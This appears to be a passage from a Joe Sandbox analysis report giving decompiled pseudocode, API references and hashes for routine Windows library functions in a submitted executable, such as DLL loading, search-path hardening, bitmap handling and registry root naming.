0x0042e86a
0x0042e86c
0x0042e875
0x0042e88c
0x0042e898
0x0042e898
0x0042e8a4
0x0042e8be
0x0042e8a6
0x0042e8b4
0x0042e8b4

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,00456035,004563D8,00455F8C,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F4AB), ref: 0042E881
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E887
InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E898

Part of subcall function 0042E7F8: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8BC,00000004,00498934,00456035,004563D8,00455F8C,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E80E
Part of subcall function 0042E7F8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E814
Part of subcall function 0042E7F8: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E825

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,00456035,004563D8,00455F8C,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8AC

Strings

ChangeWindowMessageFilterEx, xrefs: 0042E877
user32.dll, xrefs: 0042E87C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 142928637-2676053874
Opcode ID: 30bdd6e8003465d4fea4329fa8cbb1731c767cefa0c775642ffa75496dfcff28
Instruction ID: f421ee8e4a83efc3418074c22633f0ce5d19712a94174e53daf7bdcdc9ade642
Opcode Fuzzy Hash: 30bdd6e8003465d4fea4329fa8cbb1731c767cefa0c775642ffa75496dfcff28
Instruction Fuzzy Hash: BAE06DB1741720AAEA1077B66C86F9A26988B00769F5C403BF180A61D1C6BD0C50CE9E

Uniqueness

Uniqueness Score: -1.00%

Function 0044BE14 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0044BE14() {
				signed int _t1;
				struct HINSTANCE__* _t7;

				if( *0x49a76c == 0) {
					_t7 = LoadLibraryA("oleacc.dll");
					if(_t7 != 0) {
						 *0x49a774 = GetProcAddress(_t7, "LresultFromObject");
						 *0x49a778 = GetProcAddress(_t7, "CreateStdAccessibleObject");
						if( *0x49a774 != 0 &&  *0x49a778 != 0) {
							 *0x49a770 = 1;
						}
					}
					 *0x49a76c = 1;
				}
				_t1 =  *0x49a770; // 0x0
				asm("sbb eax, eax");
				return  ~( ~_t1);
			}

0x0044be1c
0x0044be28
0x0044be2c
0x0044be39
0x0044be49
0x0044be55
0x0044be60
0x0044be60
0x0044be55
0x0044be6a
0x0044be6a
0x0044be74
0x0044be7b
0x0044be80

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044E6C1), ref: 0044BE23
GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044BE34
GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044BE44

Strings

CreateStdAccessibleObject, xrefs: 0044BE3E
LresultFromObject, xrefs: 0044BE2E
oleacc.dll, xrefs: 0044BE1E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2238633743-1050967733
Opcode ID: 8bdc7ef9088ed22cb10869b3442feeb8d440459eef8afec1899d37dabf29079c
Instruction ID: 9c86094e29855d9c4fbfb7d380fa18a2fcb423c00c04bc0850f3ded04764ea6f
Opcode Fuzzy Hash: 8bdc7ef9088ed22cb10869b3442feeb8d440459eef8afec1899d37dabf29079c
Instruction Fuzzy Hash: 0CF01270540701CEFB109BF5DC8679231B4E3A0709F24217BA101561E1C7BDC4A5CF8E

Uniqueness

Uniqueness Score: -1.00%

Function 00406334 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00406334() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t6;

				_t6 = GetModuleHandleA("kernel32.dll");
				_t2 = GetProcAddress(_t6, "SetDllDirectoryW");
				if(_t2 != 0) {
					 *_t2(0x406394);
				}
				_t3 = GetProcAddress(_t6, "SetSearchPathMode");
				if(_t3 != 0) {
					return  *_t3(0x8001);
				}
				return _t3;
			}

0x0040633f
0x00406347
0x0040634e
0x00406355
0x00406355
0x0040635d
0x00406364
0x00000000
0x0040636b
0x0040636e

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00496EBC), ref: 0040633A
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D

Strings

SetDllDirectoryW, xrefs: 00406341
kernel32.dll, xrefs: 00406335
SetSearchPathMode, xrefs: 00406357

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: SetDllDirectoryW$SetSearchPathMode$kernel32.dll
API String ID: 667068680-4185904062
Opcode ID: 46a4951564b22c7c4013c457b1693ed8222a8c7de8430cd5ed63a6dc3e90f1f0
Instruction ID: 676d0f0c08149d802e5ed83e46d764d5fdf73ec46bf64f47538378b3546cd005
Opcode Fuzzy Hash: 46a4951564b22c7c4013c457b1693ed8222a8c7de8430cd5ed63a6dc3e90f1f0
Instruction Fuzzy Hash: B1D092D1380701A8EA2036F20C82E3B10488940B64B2A04377D8AB91C3DABCEC2408BD

Uniqueness

Uniqueness Score: -1.00%

Function 00477340 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00477340() {
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t4;

				_t4 = GetModuleHandleA("kernel32.dll");
				 *0x49b080 = GetProcAddress(_t4, "VerSetConditionMask");
				_t3 = GetProcAddress(_t4, "VerifyVersionInfoW");
				 *0x49b084 = _t3;
				return _t3;
			}

0x0047734b
0x00477358
0x00477363
0x00477368
0x0047736e

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00496F1B), ref: 00477346
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00477353
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00477363

Strings

kernel32.dll, xrefs: 00477341
VerSetConditionMask, xrefs: 0047734D
VerifyVersionInfoW, xrefs: 0047735D

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
API String ID: 667068680-222143506
Opcode ID: 3faa47020917b7afb68e9e0903e1c9b4bdb2150633d74a97218909a69e347e07
Instruction ID: a236109150c79272849cb7216c6885df3d9d6914e7432e1b7d128d817614c72e
Opcode Fuzzy Hash: 3faa47020917b7afb68e9e0903e1c9b4bdb2150633d74a97218909a69e347e07
Instruction Fuzzy Hash: 0CC012E0245740EDEA00A7B12DC2E7B214CD500B28350803BBCC8BD183D77D0C00EE6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B654 Relevance: 9.1, APIs: 6, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041B654(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v14;
				struct HWND__* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				signed int _v44;
				intOrPtr _v62;
				short _v64;
				void _v76;
				intOrPtr _t71;
				intOrPtr _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t95;
				void* _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr* _t123;
				intOrPtr* _t125;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				intOrPtr _t130;

				_t117 = __edi;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffb8;
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t123 = __eax;
				_t108 =  &_v76 + 4;
				 *((intOrPtr*)( *__eax))();
				_v76 = _a8;
				if(_v64 != 1) {
					E0041B364();
				}
				_t132 = _v44;
				if(_v44 == 0) {
					_v44 = E0041B4D0(_v62);
				}
				_v14 = _v44 << 2;
				_v32 = E004069BC((_v14 & 0x0000ffff) + 0x28, _t108, _t117, _t132);
				 *[fs:ecx] = _t129;
				_t95 = _v32;
				memcpy(_t95,  &_v76, 0xa << 2);
				_t130 = _t129 + 0xc;
				_t125 = _t123;
				_t121 =  *_t125;
				 *((intOrPtr*)( *_t125))( *[fs:ecx], 0x41b848, _t127);
				 *_v12 = E0041B4F0(_v32);
				_a4 = _a4 - (_v14 & 0x0000ffff) + 0x28;
				_t113 =  *((intOrPtr*)(_t95 + 0x14));
				if(_t113 != 0) {
					_t134 = _t113 - _a4;
					if(_t113 < _a4) {
						_a4 = _t113;
					}
				}
				_v28 = E004069BC(_a4, _t113, _t121, _t134);
				 *[fs:eax] = _t130;
				 *((intOrPtr*)( *_t125))( *[fs:eax], 0x41b824, _t127);
				_v20 = GetFocus();
				_t71 = _v20;
				_push(_t71);
				L00405F14();
				_v24 = _t71;
				if(_v24 == 0) {
					E0041B37C();
				}
				_push(_t127);
				_push(0x41b804);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				if( *_v12 == 0) {
					__eflags = 0;
					_v36 = 0;
				} else {
					_push(0);
					_push( *_v12);
					_t87 = _v24;
					_push(_t87);
					L00405D0C();
					_v36 = _t87;
					_push(_v24);
					L00405CCC();
				}
				_push(_t127);
				_push(0x41b7e2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				_push(0);
				_push(_v32);
				_push(_v28);
				_push(4);
				_push(_v32);
				_t79 = _v24;
				_push(_t79);
				L00405BC4();
				 *_v8 = _t79;
				if( *_v8 == 0) {
					E0041B37C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E0041B7E9);
				if(_v36 == 0) {
					return 0;
				} else {
					_push(0);
					_push(_v36);
					_t83 = _v24;
					_push(_t83);
					L00405D0C();
					return _t83;
				}
			}

0x0041b654
0x0041b655
0x0041b657
0x0041b65c
0x0041b65d
0x0041b660
0x0041b663
0x0041b668
0x0041b674
0x0041b679
0x0041b681
0x0041b683
0x0041b683
0x0041b688
0x0041b68c
0x0041b697
0x0041b697
0x0041b6a1
0x0041b6b1
0x0041b6bf
0x0041b6c2
0x0041b6d0
0x0041b6d0
0x0041b6d2
0x0041b6dc
0x0041b6de
0x0041b6eb
0x0041b6f6
0x0041b6f9
0x0041b6fe
0x0041b700
0x0041b703
0x0041b705
0x0041b705
0x0041b703
0x0041b710
0x0041b71e
0x0041b72b
0x0041b732
0x0041b735
0x0041b738
0x0041b739
0x0041b73e
0x0041b745
0x0041b747
0x0041b747
0x0041b74e
0x0041b74f
0x0041b754
0x0041b757
0x0041b760
0x0041b781
0x0041b783
0x0041b762
0x0041b762
0x0041b769
0x0041b76a
0x0041b76d
0x0041b76e
0x0041b773
0x0041b779
0x0041b77a
0x0041b77a
0x0041b788
0x0041b789
0x0041b78e
0x0041b791
0x0041b794
0x0041b799
0x0041b79d
0x0041b79e
0x0041b7a3
0x0041b7a4
0x0041b7a7
0x0041b7a8
0x0041b7b0
0x0041b7b8
0x0041b7ba
0x0041b7ba
0x0041b7c1
0x0041b7c4
0x0041b7c7
0x0041b7d0
0x0041b7e1
0x0041b7d2
0x0041b7d2
0x0041b7d7
0x0041b7d8
0x0041b7db
0x0041b7dc
0x00000000
0x0041b7dc

APIs

GetFocus.USER32 ref: 0041B72D
740BAC50.USER32(?), ref: 0041B739
740BB410.GDI32(00000000,?,00000000,00000000,0041B804,?,?), ref: 0041B76E
740BB150.GDI32(00000000,00000000,?,00000000,00000000,0041B804,?,?), ref: 0041B77A
740BA7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7E2,?,00000000,0041B804,?,?), ref: 0041B7A8
740BB410.GDI32(00000000,00000000,00000000,0041B7E9,?,?,00000000,00000000,0041B7E2,?,00000000,0041B804,?,?), ref: 0041B7DC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B410$B150Focus
String ID:
API String ID: 1979529269-0
Opcode ID: 3c7878d60c44b5f17e172cd8bb0d2994c64aa00f0204818519f339f43435c2da
Instruction ID: cd2a701423028df911f5b3be5ed513c77f87f0206a81684e46f994520bac5752
Opcode Fuzzy Hash: 3c7878d60c44b5f17e172cd8bb0d2994c64aa00f0204818519f339f43435c2da
Instruction Fuzzy Hash: 98512170A002089FCF11DFA9C891AEEBBF8EF49704F104466F510A7390D7785D81CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B924 Relevance: 9.1, APIs: 6, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041B924(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v14;
				struct HWND__* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v42;
				short _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr* _t65;
				intOrPtr _t73;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr* _t94;
				void* _t104;
				signed int _t110;
				intOrPtr _t116;
				intOrPtr* _t121;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				signed int _t129;

				_t124 = _t125;
				_t126 = _t125 + 0xffffffd0;
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t121 = __eax;
				_t104 =  &_v52 + 4;
				 *((intOrPtr*)( *__eax))();
				_v52 = _a8;
				_t127 = _v44 - 1;
				if(_v44 != 1) {
					E0041B364();
				}
				_v14 = E0041B4D0(_v42) + _t53 * 2;
				_v32 = E004069BC((_v14 & 0x0000ffff) + 0xf, _t104, _v14 & 0x0000ffff, _t127);
				 *[fs:edx] = _t126;
				_t94 = _v32;
				 *_t94 = _v52;
				 *((intOrPtr*)(_t94 + 4)) = _v48;
				 *((intOrPtr*)(_t94 + 8)) = _v44;
				_t119 =  *_t121;
				 *((intOrPtr*)( *_t121))( *[fs:edx], 0x41bb15, _t124);
				 *_v12 = E0041B858(_v32, _t94 + 0xc, _t127);
				_t65 = _t94;
				_t110 = ( *(_t65 + 4) & 0x0000ffff) * ( *(_t65 + 0xa) & 0x0000ffff) + 0x1f;
				if(_t110 < 0) {
					_t110 = _t110 + 0x1f;
					_t129 = _t110;
				}
				_v40 = (_t110 >> 5 << 2) * ( *(_t65 + 6) & 0x0000ffff);
				_v28 = E004069BC(_v40, (_t110 >> 5 << 2) * ( *(_t65 + 6) & 0x0000ffff), _t119, _t129);
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_t121))( *[fs:eax], 0x41baf1, _t124);
				_v20 = GetFocus();
				_t73 = _v20;
				_push(_t73);
				L00405F14();
				_v24 = _t73;
				if(_v24 == 0) {
					E0041B37C();
				}
				_push(_t124);
				_push(0x41bad1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126;
				_v36 = 0;
				if( *_v12 != 0) {
					_push(0);
					_push( *_v12);
					_t88 = _v24;
					_push(_t88);
					L00405D0C();
					_v36 = _t88;
					_push(_v24);
					L00405CCC();
				}
				_push(_t124);
				_push(0x41baaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126;
				_push(0);
				_push(_v32);
				_push(_v28);
				_push(4);
				_push(_t94);
				_t80 = _v24;
				_push(_t80);
				L00405BC4();
				 *_v8 = _t80;
				if( *_v8 == 0) {
					E0041B37C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E0041BAB6);
				if(_v36 != 0) {
					_push(0);
					_push(_v36);
					_t84 = _v24;
					_push(_t84);
					L00405D0C();
					return _t84;
				}
				return 0;
			}

0x0041b925
0x0041b927
0x0041b92c
0x0041b92d
0x0041b930
0x0041b933
0x0041b938
0x0041b944
0x0041b949
0x0041b94c
0x0041b951
0x0041b953
0x0041b953
0x0041b964
0x0041b976
0x0041b984
0x0041b987
0x0041b98d
0x0041b992
0x0041b998
0x0041b9a2
0x0041b9a4
0x0041b9b1
0x0041b9b3
0x0041b9c0
0x0041b9c5
0x0041b9c7
0x0041b9c7
0x0041b9c7
0x0041b9d7
0x0041b9e2
0x0041b9f0
0x0041b9fd
0x0041ba04
0x0041ba07
0x0041ba0a
0x0041ba0b
0x0041ba10
0x0041ba17
0x0041ba19
0x0041ba19
0x0041ba20
0x0041ba21
0x0041ba26
0x0041ba29
0x0041ba2e
0x0041ba37
0x0041ba39
0x0041ba40
0x0041ba41
0x0041ba44
0x0041ba45
0x0041ba4a
0x0041ba50
0x0041ba51
0x0041ba51
0x0041ba58
0x0041ba59
0x0041ba5e
0x0041ba61
0x0041ba64
0x0041ba69
0x0041ba6d
0x0041ba6e
0x0041ba70
0x0041ba71
0x0041ba74
0x0041ba75
0x0041ba7d
0x0041ba85
0x0041ba87
0x0041ba87
0x0041ba8e
0x0041ba91
0x0041ba94
0x0041ba9d
0x0041ba9f
0x0041baa4
0x0041baa5
0x0041baa8
0x0041baa9
0x00000000
0x0041baa9
0x0041baae

APIs

GetFocus.USER32 ref: 0041B9FF
740BAC50.USER32(?), ref: 0041BA0B
740BB410.GDI32(00000000,?,00000000,00000000,0041BAD1,?,?), ref: 0041BA45
740BB150.GDI32(00000000,00000000,?,00000000,00000000,0041BAD1,?,?), ref: 0041BA51
740BA7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAAF,?,00000000,0041BAD1,?,?), ref: 0041BA75
740BB410.GDI32(00000000,00000000,00000000,0041BAB6,?,?,00000000,00000000,0041BAAF,?,00000000,0041BAD1,?,?), ref: 0041BAA9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B410$B150Focus
String ID:
API String ID: 1979529269-0
Opcode ID: 1b5c3aaf39abfb32ff705986f931cf2caaf3c43be24d6a1839e561c266172d4b
Instruction ID: c42898f10a58dc438a5f451a1a67da607c337991275f3a20adb605244c83d1ef
Opcode Fuzzy Hash: 1b5c3aaf39abfb32ff705986f931cf2caaf3c43be24d6a1839e561c266172d4b
Instruction Fuzzy Hash: 90511B75A002189FCB11DFA9C895AAEBBF9FF49700F11806AF504EB751D7789D40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4F0 Relevance: 9.1, APIs: 6, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041B4F0(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				void* __edi;
				short _t45;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr* _t64;
				short* _t71;
				intOrPtr _t78;
				signed int _t80;
				void* _t82;
				intOrPtr _t84;
				short _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t94;
				intOrPtr _t95;

				_t92 = _t94;
				_t95 = _t94 + 0xffffffe8;
				_push(_t82);
				_v8 = __eax;
				_v12 = 0;
				_t45 =  *((intOrPtr*)(_v8 + 0x20));
				if(_t45 == 0) {
					_t87 = E0041B4D0( *((intOrPtr*)(_v8 + 0xe)));
				} else {
					_t78 = _v8;
					_t87 = _t45;
				}
				_t99 = _t87 - 2;
				if(_t87 <= 2) {
					return _v12;
				} else {
					_v20 = (_t87 - 1 << 2) + 8;
					_v16 = E004069BC(_v20, _t78, _t82, _t99);
					_push(_t92);
					_push(0x41b640);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t95;
					_t71 = _v16;
					E00402934(_t71, _v20);
					 *((short*)(_t71 + 2)) = _t87;
					 *_t71 = 0x300;
					_v28 = GetFocus();
					_t59 = _v28;
					_push(_t59);
					L00405F14();
					_v24 = _t59;
					_push(_t92);
					_push(0x41b614);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t95;
					_push(0x68);
					_t60 = _v24;
					_push(_t60);
					L00405C44();
					_t84 = _t60;
					if(_t87 != 0x10 || _t84 < 0x10) {
						_t89 = _t87 - 1;
						__eflags = _t89;
						if(_t89 >= 0) {
							_t90 = _t89 + 1;
							_t80 = 0;
							_t64 = _v8 + 0x2a;
							__eflags = _t64;
							do {
								 *((char*)(_t71 + 4 + _t80 * 4)) =  *_t64;
								 *((char*)(_t71 + 5 + _t80 * 4)) =  *((intOrPtr*)(_t64 - 1));
								 *((char*)(_t71 + 6 + _t80 * 4)) =  *((intOrPtr*)(_t64 - 2));
								 *((char*)(_t71 + 7 + _t80 * 4)) = 0;
								_t80 = _t80 + 1;
								_t64 = _t64 + 4;
								_t90 = _t90 - 1;
								__eflags = _t90;
							} while (_t90 != 0);
						}
					} else {
						_push(_t71 + 4);
						_push(8);
						_push(0);
						_push(_v24);
						L00405C6C();
						_push(_t71 + 0x24);
						_push(8);
						_push(_t84 - 8);
						_push(_v24);
						L00405C6C();
					}
					_pop( *[fs:0x0]);
					_push(E0041B61B);
					_push(_v24);
					_t62 = _v28;
					_push(_t62);
					L004060FC();
					return _t62;
				}
			}

0x0041b4f1
0x0041b4f3
0x0041b4f8
0x0041b4f9
0x0041b4fe
0x0041b504
0x0041b509
0x0041b51e
0x0041b50b
0x0041b50b
0x0041b50e
0x0041b50e
0x0041b520
0x0041b523
0x0041b650
0x0041b529
0x0041b532
0x0041b53d
0x0041b542
0x0041b543
0x0041b548
0x0041b54b
0x0041b54e
0x0041b558
0x0041b55d
0x0041b561
0x0041b56b
0x0041b56e
0x0041b571
0x0041b572
0x0041b577
0x0041b57c
0x0041b57d
0x0041b582
0x0041b585
0x0041b588
0x0041b58a
0x0041b58d
0x0041b58e
0x0041b593
0x0041b598
0x0041b5c9
0x0041b5ca
0x0041b5cc
0x0041b5ce
0x0041b5cf
0x0041b5d4
0x0041b5d4
0x0041b5d7
0x0041b5d9
0x0041b5e0
0x0041b5e7
0x0041b5eb
0x0041b5f0
0x0041b5f1
0x0041b5f4
0x0041b5f4
0x0041b5f4
0x0041b5d7
0x0041b59f
0x0041b5a2
0x0041b5a3
0x0041b5a5
0x0041b5aa
0x0041b5ab
0x0041b5b9
0x0041b5ba
0x0041b5bd
0x0041b5c1
0x0041b5c2
0x0041b5c2
0x0041b5f7
0x0041b601
0x0041b609
0x0041b60a
0x0041b60d
0x0041b60e
0x0041b613
0x0041b613

APIs

GetFocus.USER32(00000000,0041B640,?,?,?,?), ref: 0041B566
740BAC50.USER32(?,00000000,0041B640,?,?,?,?), ref: 0041B572
740BAD70.GDI32(?,00000068,00000000,0041B614,?,?,00000000,0041B640,?,?,?,?), ref: 0041B58E
740BAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B614,?,?,00000000,0041B640,?,?,?,?), ref: 0041B5AB
740BAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B614,?,?,00000000,0041B640), ref: 0041B5C2
740BB380.USER32(?,?,0041B61B,?,?), ref: 0041B60E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B380Focus
String ID:
API String ID: 3891926489-0
Opcode ID: 17c1b08f9844acdc802f8e535b6c9e4446ce47f3e55dce3a221187752f3c61b8
Instruction ID: be02c3be859bf01bab4daeb430cba663bcef9c8b7ac46c13fc9acf689f5ddf0f
Opcode Fuzzy Hash: 17c1b08f9844acdc802f8e535b6c9e4446ce47f3e55dce3a221187752f3c61b8
Instruction Fuzzy Hash: 1441E871A00658AFCB10DFA9C885AAFBBF5EF59704F1584AAF500E7351D3389D10CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0045C3E8 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0045C3E8(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				char _v8;
				void* _t35;
				void* _t44;
				intOrPtr _t48;
				void* _t49;
				void* _t51;
				void* _t57;
				intOrPtr _t60;

				_t55 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t57 = __ecx;
				_t35 = __eax;
				_push(_t60);
				_push(0x45c4b4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60;
				_t44 = __edx - 0x80000000;
				if(_t44 == 0) {
					E00403494( &_v8, "CLASSES_ROOT");
					goto L10;
				} else {
					_t49 = _t44 - 1;
					if(_t49 == 0) {
						E00403494( &_v8, "CURRENT_USER");
						goto L10;
					} else {
						_t51 = _t49 - 1;
						if(_t51 == 0) {
							E00403494( &_v8, "MACHINE");
							goto L10;
						} else {
							if(_t51 == 1) {
								E00403494( &_v8, 0x45c510);
								L10:
								_push(_v8);
